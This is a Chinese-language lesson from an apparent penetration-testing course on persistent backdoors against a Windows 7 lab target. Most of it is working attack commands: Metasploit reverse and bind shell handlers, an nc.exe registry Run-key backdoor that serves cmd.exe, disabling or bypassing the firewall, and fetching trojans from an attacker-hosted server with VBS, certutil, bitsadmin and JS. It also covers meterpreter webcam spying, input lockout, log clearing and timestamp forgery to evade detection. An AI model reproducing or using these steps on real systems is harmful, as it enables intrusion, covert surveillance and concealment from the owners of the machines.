1.12 进阶后门操作

本篇内容使用win7-sp1靶机，请在资源库中自行下载导入

进阶后门操作

复习

进入kali后若想要连接此前已经设置好的后门：

通过服务启动

1
2
3
4
5


use exploit/multi/handler
setpayload windows/metsvc_bind_tcp
set lport 31337
set rhost [目标ip]
run

永久性后门

1
2
3
4
5


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 4321
set lhost [自己ip]
run

植入备用后门

上传文件

我们从【win10攻击机】中取nc.exe复制到kali中的kali文件夹，

回到meterpreter终端：

1

upload /home/kali/nc.exe c:\\

将nc.exe上传到对方的C盘

修改注册表

查看对方开机自启的配置

1

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

为了防止meterpreter失效，接下来我们要把nc放到对方的自动启动里当作后门

1

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'c:\nc.exe -ldp 444 -e cmd.exe'

这句话的意思是开机时启动nc并且执行后面的命令使它监听444端口，如果监听到连接就返回一个cmd命令行

使用下面的命令可用查看刚才写的注册表条目详细信息

1

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc

控制防火墙

直接关闭

因为中文乱码的缘故不方便查看防火墙的状态，所以我们都直接执行一遍防火墙关闭命令就可以了

1
2


shell
netsh advfirewall set allprofiles state off

增加规则

为了防止关闭防火墙引起对方怀疑，我们也可以使用增加一条允许444端口的规则的方法

1
2


shell
netsh firewall add portopening TCP 444 "FireWall" ENABLE ALL

使用nc连接

现在我们重启一下靶机，重启后用nc连接看看是否成功

1

nc -v [目标ip] 444

缺点

上面的操作中修改注册表的内容可以在msconfig里查到，所以我们可以考虑使用自解压的方式进行伪装

远程下载木马

启动apache

1

service apache2 start

apache的目录位于/var/www/html/中，我们可以在里面放上木马文件

方法一：使用vbs下载文件

用echo命令创建a.vbs

1
2
3
4


echo set a=createobject("adod"+"b.stream"):set
w=createobject("micr"+"osoft.xmlhttp"):w.open"get",wsh.arguments(
0), 0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(
1),2 >> a.vbs

也可以使用中间的代码手动创建

然后在cmd中执行下面的命令即可将木马保存到c盘 （对exe效果可能不好，适合文字脚本类）

1

cscript a.vbs http://[攻击机ip]/木马文件名 c:\木马文件名

方法二：使用certutil下载文件

在cmd中执行 （这个也不适合exe等大文件）

1

certutil -urlcache -split -f http://[攻击机ip]/木马文件名

文件会下载到本目录（cmd打开的地方）

弊端：每次下载会留下入侵痕迹，所以要进行痕迹清理，方法如下

1

certutil -urlcache -split -f http://[攻击机ip]/木马文件名 delete

拓展：certutil的其他功能

校验hash值：

1

certutil -hashfile [文件路径及名称，例如c:\hi.exe]

加密解密文件（虽然不带密钥而且可逆我也不知道为什么配叫加密）：

1
2
3
4


# 加密
certutil -encode c:\a.txt c:\b.txt
# 解密
certutil -decode c:\b.txt c:\a.txt

方法三：使用bitsadmin下载文件

在cmd中执行

1
2


bitsadmin /rawreturn /transfer down http://[攻击机ip]/木马文件名 [保存路径及文件名]
# 例如 bitsadmin /rawreturn /transfer down http://192.168.80.133/1.txt c:\1.txt

方法三：使用js下载文件

新建a.js文件

1
2
3


var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET",WScript.Arguments(0),/*async =* /false);WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

在同目录cmd中执行

1

cscript /nologo a.js http://192.168.80.133/1.txt >> 123.txt

meterpreter操作补充

禁用键盘/鼠标

禁用 uictl disable keyboard或mouse

启用 uictl enable keyboard或mouse

摄像头

webcam_list 查看摄像头

webcam_snap 通过摄像头拍照

webcam_stream 通过摄像头开启视频

程序相关

execute 在目标上面执行程序

execute -H -i -f cmd.exe 后台执行程序

getpid 获取当前进程pid

ps 查看活跃进程

migreate [pid] 把meterpreter转移到某个pid

kill [pid] 杀掉某个进程

反侦察

clearev 一键清除日志

timestomp -v c://a.exe 查看c盘a.exe的时间戳

timestomp -v c://b.exe c://a.exe 将a.exe的修改时间复制给b.eex